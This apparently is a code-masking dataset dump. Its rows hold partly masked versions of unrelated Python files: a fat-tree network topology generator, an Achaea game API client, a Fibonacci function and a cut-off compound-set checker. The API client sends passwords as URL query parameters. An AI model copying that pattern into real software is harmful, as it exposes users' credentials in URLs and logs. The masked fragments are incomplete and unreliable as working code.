raise Exception('L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'.format(L))
if k % 2 != 0:
raise Exception('k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'.format(k))
channel_names = gen_channel_names(num_channels)
# initialise network nodes
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label, core_label]
#num_cores = int((k/2)**(L-1))
#num_cores = int((k/2)**2)
num_cores = int((k/2)**(L/2))
num_aggs = int((k**2)/2)
num_edges = int((k**2)/2)
num_pods = int(2*(k/2)**(L-2))
num_racks = int(2*(k/2)**(L-1))
num_servers = int(num_racks * n)
cores = [core_label+'_'+str(i) for i in range(num_cores)]
aggs = [aggregate_label+'_'+str(i) for i in range(num_aggs)]
edges = [edge_label+'_'+str(i) for i in range(num_edges)]
racks = [rack_label+'_'+str(i) for i in range(num_racks)]
servers = [ep_label+'_'+str(i) for i in range(num_servers)]
# create core and rack layer networks
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
# combine cores and racks into single network
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
# 2 layers: Core, ToR
# link racks to cores, add link attributes
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
# have k/2 up-ports on each switch
for up_port in range(int(k/2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network,
(rack, core),
channel_names,
rack_to_core_channel_capacity)
else:
# 4 layers: Core, Agg, Edge, ToR. Agg and Edge switches grouped into pods.
# group edges and aggregates into pods
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + (k/2))
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
# create dict of pod networks
pod_labels = ['pod_'+str(i) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = ('pod_'+str(pod_iter),)
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
# connect edge and aggregate switches within pod, add link attributes
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key],
(pod_agg,pod_edge),
channel_names,
edge_to_agg_channel_capacity)
# add pods (agg + edge) layer to fat-tree
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[pod_iter])
# link aggregate switches in pods to core switches, add link attributes
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network,
(core,pod_agg),
channel_names,
agg_to_core_channel_capacity)
# link edge switches in pods to racks, add link attributes
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network,
(pod_edge,rack),
channel_names,
rack_to_edge_channel_capacity)
# link servers to racks, add link attributes
racks_dict = {rack: [] for rack in racks} # track which endpoints in which rack
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network,
(rack, server),
channel_names,
server_to_rack_channel_capacity)
racks_dict[rack].append(server)
# calc total network capacity
# /= 2 to get max theoretical capacity (number of units which network can transfer per unit time)
max_nw_capacity = (num_servers * num_channels * server_to_rack_channel_capacity) / 2
# init global network attrs
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network,
max_nw_capacity,
num_channels,
ep_link_capacity=server_to_rack_channel_capacity*num_channels,
endpoint_label=ep_label,
node_labels=node_labels,
topology_type='fat_tree',
racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
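# Editor's sketch: a quick check of the sizing formulas in the docstring above,
# for the 2-layer (spine-leaf) case. With k=4: (k/2)^(L/2) = 2 cores,
# 2*(k/2)^(L-1) = 4 racks, and 4*n servers.
def _demo_fat_tree_sizes(k=4, n=4):
    net = gen_fat_tree(k=k, L=2, n=n, show_fig=False)
    expected_racks = int(2 * (k / 2))
    assert len(net.graph['endpoints']) == expected_racks * n
    return net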
def init_global_network_attrs(network,
max_nw_capacity,
num_channels,
ep_link_capacity,
endpoint_label = 'server',
topology_type='unknown',
node_labels=['server'],
racks_dict=None):
'''Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
        racks_dict (dict): Which servers/endpoints are in which rack. If None,
            assume there is no rack system (i.e. servers are not grouped into
            racks).
'''
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2 # all eps have a src & a dst port
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
# ensure racks dict is str so json serialisable
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
# switch racks_dict keys and values to make hashing easier
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
def gen_channel_names(num_channels):
'''Generates channel names for channels on each link in network.'''
channels = [channel+1 for channel in range(num_channels)]
channel_names = ['channel_' + str(channel) for channel in channels]
return channel_names
def add_edge_capacity_attrs(network,
edge,
channel_names,
channel_capacity,
bidirectional_links=True):
'''Adds channels and corresponding max channel bytes to single edge in network.
Args:
        network (networkx graph): Network containing edges to which attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
'''
if bidirectional_links:
attrs = {edge:
{'{}_to_{}_port'.format(edge[0], edge[1]):
{'channels':
{channel: channel_capacity/2 for channel in channel_names},
'max_channel_capacity': channel_capacity/2
},
'{}_to_{}_port'.format(edge[1], edge[0]):
{'channels':
{channel: channel_capacity/2 for channel in channel_names},
'max_channel_capacity': channel_capacity/2
}
}
}
else:
attrs = {edge:
{'channels': {channel: channel_capacity for channel in channel_names},
'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network,
edges,
channel_names,
channel_capacity,
bidirectional_links=True):
    '''Adds channels and max channel capacities to multiple edges in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
or network[0][1]['1_to_0_port']['channels']['channel_1] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
'''
if bidirectional_links:
attrs = {edge:
{'{}_to_{}_port'.format(edge[0], edge[1]):
{'channels':
{channel: channel_capacity/2 for channel in channel_names},
'max_channel_capacity': channel_capacity/2
},
'{}_to_{}_port'.format(edge[1], edge[0]):
{'channels':
{channel: channel_capacity/2 for channel in channel_names},
'max_channel_capacity': channel_capacity/2
}
}
for edge in edges}
else:
attrs = {edge:
{'channels':
{channel: channel_capacity for channel in channel_names},
'max_channel_capacity':
channel_capacity
} for edge in edges}
nx.set_edge_attributes(network, attrs)
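# Editor's sketch: the access pattern described in the docstring above, on a
# toy two-node graph (assumes networkx is imported as nx, as elsewhere here).
def _demo_edge_attr_access():
    g = nx.Graph()
    g.add_edge(0, 1)
    add_edges_capacity_attrs(g, [(0, 1)], gen_channel_names(2), 100)
    # with bidirectional_links=True each port gets half the channel capacity
    return g[0][1]['0_to_1_port']['channels']['channel_1']  # -> 50.0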
def get_node_type_dict(network, node_types=[]):
'''Gets dict where keys are node types, values are list of nodes for each node type in graph.'''
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
# not this node type
pass
return network_nodes_dict
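# Editor's sketch: get_node_type_dict buckets nodes by substring match on the
# given type labels.
def _demo_node_type_dict():
    g = nx.Graph()
    g.add_nodes_from(['server_0', 'server_1', 'rack_0'])
    return get_node_type_dict(g, node_types=['server', 'rack'])
    # -> {'server': ['server_0', 'server_1'], 'rack': ['rack_0']}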
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
'''Gets networkx positions of nodes in fat tree network for plotting.'''
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
    heights = {} # dict for height separation between fat tree layers
widths = {} # dict for width separation between nodes within layers
h = iter([1, 2, 3, 4, 5]) # server, rack, edge, agg, core heights
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1/(len(node_type_dict[node_type])+1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = ((idx+1)*widths[node_type]*width_scale,heights[node_type]*height_scale)
idx += 1
return pos
def init_network_node_positions(net):
'''Initialises network node positions for plotting.'''
if net.graph['topology_type'] == 'fat_tree':
pos = get_fat_tree_positions(net)
else:
pos = nx.nx_agraph.graphviz_layout(net, prog='neato')
return pos
def plot_network(network,
draw_node_labels=True,
ep_label='server',
network_node_size=2000,
font_size=30,
linewidths=1,
fig_scale=2,
path_to_save=None,
show_fig=False):
'''Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
        ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints have
            ep_label prefixed to their name (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
        font_size (int,float): Size of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
        matplotlib.figure.Figure: the plotted network figure.
'''
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15*fig_scale,15*fig_scale])
# add nodes and edges
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph['node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
# network nodes
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']) # server, rack, edge, agg, core
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network,
pos,
nodelist=network_nodes_dict[node_type],
node_size=network_node_size,
node_color=next(node_colours),
linewidths=linewidths,
label=node_type)
if draw_node_labels:
# nodes
nx.draw_networkx_labels(network,
pos,
font_size=font_size,
font_color='k',
font_family='sans-serif',
font_weight='normal',
alpha=1.0)
# fibre links
fibre_links = list(network.edges)
nx.draw_networkx_edges(network,
pos,
edgelist=fibre_links,
edge_color='k',
width=3,
label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
if __name__ == '__main__':
#network = gen_simple_network()
#network = gen_nsfnet_network()
    network = gen_fat_tree(k=4)  # k must be even (gen_fat_tree raises for odd k)
    plot_network(network, path_to_save='figures/graph/network_graph', show_fig=True)
| [
11,
12,
13,
15,
16
] |
652 | da66b254afb3a8fcd3783a38d8624caa917e58c3 | <mask token>
class API:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
<mask token>
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
<mask token>
<mask token>
<mask token>
<mask token>
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills,
mob_kills, explorer_rank, current_class, messages_total=None,
messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank,
player_kills, mob_kills, explorer_rank, current_class,
messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
        return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.
            unread, self.total)
| <mask token>
class API:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def __init__(self, endpoint=ACHAEA_ENDPOINT, username=None, password=None):
self.endpoint = endpoint
if username is not None and password is not None:
self.username = username
self.password = password
self.checkauth()
<mask token>
<mask token>
<mask token>
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
@_requires_auth
def _character_authed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), True)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def character(self, character=None):
if self.auth is True and (self.username == character or character is
None):
return self._character_authed(character or self.username)
else:
return self._character_unauthed(character)
<mask token>
<mask token>
<mask token>
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills,
mob_kills, explorer_rank, current_class, messages_total=None,
messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank,
player_kills, mob_kills, explorer_rank, current_class,
messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
        return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.
            unread, self.total)
| <mask token>
class API:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def __init__(self, endpoint=ACHAEA_ENDPOINT, username=None, password=None):
self.endpoint = endpoint
if username is not None and password is not None:
self.username = username
self.password = password
self.checkauth()
def _get_endpoint(self, fmt_str, args):
return self.endpoint + fmt_str.format(*args)
def _make_request(self, resource, args=(), authed=False, params={}):
endpoint = self._get_endpoint(resource, args)
auth_params = {}
if authed:
if self.username is None or self.password is None:
raise APIError()
auth_params = {'character': self.username, 'password': self.
password}
params = params.copy()
params.update(auth_params)
req = requests.get(endpoint, params=params)
return req
def checkauth(self):
if self.auth is not None:
return self.auth
req = self._make_request(self.CHECKAUTH_RESOURCE, authed=True)
if req.status_code == 200:
self.auth = True
else:
self.auth = False
return self.auth
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
@_requires_auth
def _character_authed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), True)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def character(self, character=None):
if self.auth is True and (self.username == character or character is
None):
return self._character_authed(character or self.username)
else:
return self._character_unauthed(character)
def sections(self):
req = self._make_request(self.NEWS_RESOURCE, authed=self.auth)
if req.status_code != 200:
return None
result = req.json()
sections_list = map(NewsSection.parse, result)
return sections_list
def posts(self, section, page=None):
params = {}
if page is not None:
params['page'] = page
req = self._make_request(self.SPECIFIC_NEWS_RESOURCE, (section,),
authed=self.auth, params=params)
if req.status_code != 200:
return None
result = req.json()
return result
<mask token>
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills,
mob_kills, explorer_rank, current_class, messages_total=None,
messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank,
player_kills, mob_kills, explorer_rank, current_class,
messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
        return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.
            unread, self.total)
| <mask token>
def _requires_auth(func):
def wrapper(self, *args, **kwargs):
if self.auth is not True:
raise APIError()
return func(self, *args, **kwargs)
return wrapper
class API:
auth = None
CHECKAUTH_RESOURCE = '/checkauth.json'
CHARACTERS_RESOURCE = '/characters.json'
SPECIFIC_CHARACTER_RESOURCE = '/characters/{}.json'
NEWS_RESOURCE = '/news.json'
SPECIFIC_NEWS_RESOURCE = '/news/{}.json'
SPECIFIC_NEWS_POST_RESOURCE = '/news/{}/{}.json'
def __init__(self, endpoint=ACHAEA_ENDPOINT, username=None, password=None):
self.endpoint = endpoint
if username is not None and password is not None:
self.username = username
self.password = password
self.checkauth()
def _get_endpoint(self, fmt_str, args):
return self.endpoint + fmt_str.format(*args)
def _make_request(self, resource, args=(), authed=False, params={}):
endpoint = self._get_endpoint(resource, args)
auth_params = {}
if authed:
if self.username is None or self.password is None:
raise APIError()
auth_params = {'character': self.username, 'password': self.
password}
params = params.copy()
params.update(auth_params)
req = requests.get(endpoint, params=params)
return req
def checkauth(self):
if self.auth is not None:
return self.auth
req = self._make_request(self.CHECKAUTH_RESOURCE, authed=True)
if req.status_code == 200:
self.auth = True
else:
self.auth = False
return self.auth
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
@_requires_auth
def _character_authed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), True)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (
character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def character(self, character=None):
if self.auth is True and (self.username == character or character is
None):
return self._character_authed(character or self.username)
else:
return self._character_unauthed(character)
def sections(self):
req = self._make_request(self.NEWS_RESOURCE, authed=self.auth)
if req.status_code != 200:
return None
result = req.json()
sections_list = map(NewsSection.parse, result)
return sections_list
def posts(self, section, page=None):
params = {}
if page is not None:
params['page'] = page
req = self._make_request(self.SPECIFIC_NEWS_RESOURCE, (section,),
authed=self.auth, params=params)
if req.status_code != 200:
return None
result = req.json()
return result
def post(self, section, number):
pass
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills,
mob_kills, explorer_rank, current_class, messages_total=None,
messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank,
player_kills, mob_kills, explorer_rank, current_class,
messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
        return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.
            unread, self.total)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
ACHAEA_ENDPOINT = 'https://api.achaea.com'
def _requires_auth(func):
def wrapper(self, *args, **kwargs):
if self.auth is not True:
raise APIError()
return func(self, *args, **kwargs)
return wrapper
class API:
auth = None
CHECKAUTH_RESOURCE = '/checkauth.json'
CHARACTERS_RESOURCE = '/characters.json'
SPECIFIC_CHARACTER_RESOURCE = '/characters/{}.json'
NEWS_RESOURCE = '/news.json'
SPECIFIC_NEWS_RESOURCE = '/news/{}.json'
SPECIFIC_NEWS_POST_RESOURCE = '/news/{}/{}.json'
def __init__(self, endpoint=ACHAEA_ENDPOINT, username=None, password=None):
self.endpoint = endpoint
if username is not None and password is not None:
self.username = username
self.password = password
self.checkauth()
def _get_endpoint(self, fmt_str, args):
return self.endpoint + fmt_str.format(*args)
def _make_request(self, resource, args=(), authed=False, params={}):
endpoint = self._get_endpoint(resource, args)
auth_params = {}
if authed:
if self.username is None or self.password is None:
raise APIError()
auth_params = {'character': self.username, 'password': self.password}
params = params.copy()
params.update(auth_params)
req = requests.get(endpoint, params=params)
return req
def checkauth(self):
if self.auth is not None:
return self.auth
req = self._make_request(self.CHECKAUTH_RESOURCE, authed=True)
if req.status_code == 200:
self.auth = True
else:
self.auth = False
return self.auth
def characters(self):
req = self._make_request(self.CHARACTERS_RESOURCE)
if req.status_code != 200:
return None
result = req.json()
characters = []
for character in result['characters']:
characters.append(character['name'])
return characters
@_requires_auth
def _character_authed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (character,), True)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def _character_unauthed(self, character):
req = self._make_request(self.SPECIFIC_CHARACTER_RESOURCE, (character,), False)
if req.status_code != 200:
return None
result = req.json()
return Character.parse(result)
def character(self, character=None):
if self.auth is True and (self.username == character or character is None):
return self._character_authed(character or self.username)
else:
return self._character_unauthed(character)
def sections(self):
req = self._make_request(self.NEWS_RESOURCE, authed=self.auth)
if req.status_code != 200:
return None
result = req.json()
sections_list = map(NewsSection.parse, result)
return sections_list
def posts(self, section, page=None):
params = {}
if page is not None:
params['page'] = page
req = self._make_request(self.SPECIFIC_NEWS_RESOURCE, (section,), authed=self.auth,
params=params)
if req.status_code != 200:
return None
result = req.json()
return result
def post(self, section, number):
pass
class APIError(Exception):
pass
class Character:
def __init__(self, name, fullname, level, house, xp_rank, player_kills, mob_kills,
explorer_rank, current_class, messages_total=None, messages_unread=None):
self.name = name
self.fullname = fullname
self.level = level
self.house = house
self.xp_rank = xp_rank
self.player_kills = player_kills
self.mob_kills = mob_kills
self.explorer_rank = explorer_rank
self.current_class = current_class
self.messages_total = messages_total
self.messages_unread = messages_unread
@staticmethod
def parse(json_data):
name = json_data['name']
fullname = json_data['fullname']
level = int(json_data['level'])
house = json_data['house']
xp_rank = json_data['xp_rank']
player_kills = int(json_data['player_kills'])
mob_kills = int(json_data['mob_kills'])
explorer_rank = int(json_data['explorer_rank'])
current_class = json_data['class']
messages_total = None
messages_unread = None
if 'messages_total' in json_data and 'messages_unread' in json_data:
messages_total = json_data['messages_total']
messages_unread = json_data['messages_unread']
return Character(name, fullname, level, house, xp_rank, player_kills, mob_kills,
explorer_rank, current_class, messages_total, messages_unread)
def __repr__(self):
return '<Character: {} ({})>'.format(self.name, self.fullname)
class NewsSection:
def __init__(self, name, read, total, unread):
self.name = name
self.read = read
self.total = total
self.unread = unread
@staticmethod
def parse(json_data):
name = json_data['name']
read = int(json_data['read'])
total = int(json_data['total'])
unread = int(json_data['unread'])
return NewsSection(name, read, total, unread)
def __repr__(self):
        return '<NewsSection: {} ({}/{} unread)>'.format(self.name, self.unread, self.total)
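# Editor's sketch (not in the original file): minimal unauthenticated usage.
# The character name printed is simply the first one the public endpoint returns.
def _demo_api():
    api = API()               # anonymous client against ACHAEA_ENDPOINT
    names = api.characters()  # None on HTTP error
    if names:
        print(api.character(names[0]))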
| [
12,
15,
20,
23,
26
] |
653 | 83c7bb2e109f8affd9e2a12e8c5370b0f5a34048 | <mask token>
| def fibonacci(quantidade):
resultado = [1, 2]
for _ in range(2, quantidade):
resultado.append(sum(resultado[-2:]))
return resultado
<mask token>
| def fibonacci(quantidade):
resultado = [1, 2]
for _ in range(2, quantidade):
resultado.append(sum(resultado[-2:]))
return resultado
for fib in fibonacci(20):
print(fib)
| def fibonacci(quantidade):
resultado = [1, 2]
    # while True:
    # replace the while with a for over a range starting at the list's 2nd
    # value and running up to the count given by the "quantidade" parameter
    for _ in range(2, quantidade):
        # this way it extends the sequence from the 2nd element of the list
        # until the requested count is reached.
        # we use _ in the for to show the loop variable is unused
resultado.append(sum(resultado[-2:]))
return resultado
for fib in fibonacci(20):
print(fib)
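# Editor's sketch: the same sequence written as a generator, which avoids
# building the whole list up front.
def fibonacci_gen(quantidade):
    a, b = 1, 2
    for _ in range(quantidade):
        yield a
        a, b = b, a + b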
| null | [
0,
1,
2,
3
] |
654 | 0082f75332321dba498f06d4c4a99c9248829b59 | <mask token>
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp(
'submitter_name'), 'submitter__email': description_mol.GetProp(
'submitter_email'), 'submitter__institution': description_mol.
GetProp('submitter_institution'), 'submitter__generation_date':
datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query) != 0:
